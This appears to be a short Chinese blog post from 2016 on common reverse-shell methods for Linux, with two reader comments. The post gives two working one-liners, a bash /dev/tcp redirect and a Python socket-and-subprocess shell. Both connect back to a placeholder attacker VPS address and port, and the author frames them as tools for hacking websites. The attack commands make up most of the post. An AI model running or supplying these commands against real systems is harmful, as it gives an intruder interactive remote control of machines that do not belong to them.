Linux下反弹Shell的常用方法

Linux 2016-05-21

额,我个人目前只有两种方式反弹shell,暂时没有碰到过奇葩的linux,所以目前只用过两种。

bash弹shell
xx.xx.xx.xx换成你的vps ip,82换成你vps监听的端口

bash -i >& /dev/tcp/xx.xx.xx.xx/82 0>&1       

Python反弹shell
xx.xx.xx.xx换成你的vps ip,82换成你vps监听的端口

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",82));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

本文由 Mosuan 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

已有 2 人抢先你了

  1. a a

    PHP也可以反弹 ps

    1. - -我常用就这两种,说到底还是日站少

添加新评论